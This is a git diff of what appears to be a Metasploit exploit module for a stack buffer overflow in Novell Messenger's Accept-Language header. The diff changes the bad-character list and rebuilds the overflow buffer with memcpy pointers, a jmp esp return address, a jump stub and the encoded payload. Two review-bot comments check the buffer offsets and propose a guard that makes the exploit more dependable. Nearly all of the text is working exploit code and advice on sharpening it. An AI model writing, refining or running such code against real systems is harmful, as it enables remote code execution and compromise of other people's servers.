Updated
git-svn-id: file:///home/svn/incoming/trunk@3601 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
589205e5ff
commit
7e0f539b12
|
@ -31,9 +31,7 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
|||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' =>
|
||||
"\x00\x3a\x3b\x3c\x3d\x3e\x3f\x09\x0b\x0a\x0d\x20\x21\x22\x23\x24\x25\x26\x2c\x10"+
|
||||
[*("A".."Z")].join,
|
||||
'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join,
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
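Review bot: The new `'BadChars'` line gives no reason for excluding every uppercase letter, and it silently drops the 0x0d, 0x20 and 0x3a–0x3f entries the old set had, so a later maintainer cannot tell whether those bytes were found to be safe or were removed by mistake. Excluding A–Z normally means the header value is case-folded before it reaches the vulnerable copy; if that is what was observed, it is worth recording, because the same transformation also applies to the return addresses and jump stub the exploit method writes into the same buffer. Suggest a comment above the line: `# A-Z are excluded because the Accept-Language value appears to be case-folded before the vulnerable copy (confirm against the target); 0x00/0x0a/0x2c/0x3b terminate or split the header value.` The enclosing info hash starts and ends outside this hunk.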
|
||||
|
@ -49,34 +47,12 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
|||
def exploit
|
||||
connect
|
||||
|
||||
lang =
|
||||
# Padding to reach the memcpy src pointer
|
||||
Rex::Text.rand_text_alphanumeric(16) +
|
||||
|
||||
# The source pointer for the memcpy
|
||||
[target['Rets'][1]].pack('V') +
|
||||
|
||||
# Padding to reach the stack return address
|
||||
Rex::Text.rand_text_alphanumeric(240)
|
||||
|
||||
# The return address (a jmp esp)
|
||||
[target['Rets'][0]].pack('V') +
|
||||
|
||||
# Jump over the next 6 bytes to payload
|
||||
"\xeb\x06" +
|
||||
|
||||
# Padding to reach the memcpy dst pointer
|
||||
Rex::Text.rand_text_alphanumeric(2) +
|
||||
|
||||
# The destination pointer for the memcpy
|
||||
[target['Rets'][1]].pack('V') +
|
||||
|
||||
# The actual payload
|
||||
payload.encoded +
|
||||
|
||||
# Padding to keep the request aligned in memory
|
||||
Rex::Text.rand_text_alphanumeric(1500-payload.encoded.length)
|
||||
|
||||
lang = Rex::Text.rand_text_alphanumeric(1900)
|
||||
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
||||
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
||||
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
||||
lang[268, 2] = "\xeb\x06"
|
||||
lang[276, payload.encoded.length] = payload.encoded
|
||||
|
||||
res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"
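Review bot: The return addresses and the `\xeb\x06` stub written at offsets 16, 264, 268 and 272 are never checked against the module's bad-character set, whereas the payload at offset 276 is encoded around it. If either address in `target['Rets']` contains a 0x41–0x5a byte or one of 0x00/0x0a/0x2c/0x3b, whatever mangling makes those bytes bad for the payload will presumably corrupt the pointer or the jump as well, and the module would fail without saying why. A guard before `res` is built makes that an explicit error: `rets = target['Rets'].map { |r| [r].pack('V') }` followed by `raise "target return address contains a bad character" if rets.any? { |r| r =~ /[\x00\x0a\x2c\x3bA-Z]/ }`. The buffer layout itself looks consistent (the jump at 268 skips the two filler bytes and the DST pointer to land on the payload at 276, and 'Space' => 500 keeps the payload inside the 1900-byte buffer), so a short comment stating that arithmetic next to the `lang[268, 2]` line would also help. The `exploit` method continues past the end of this hunk.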
|
||||
|
||||
|
|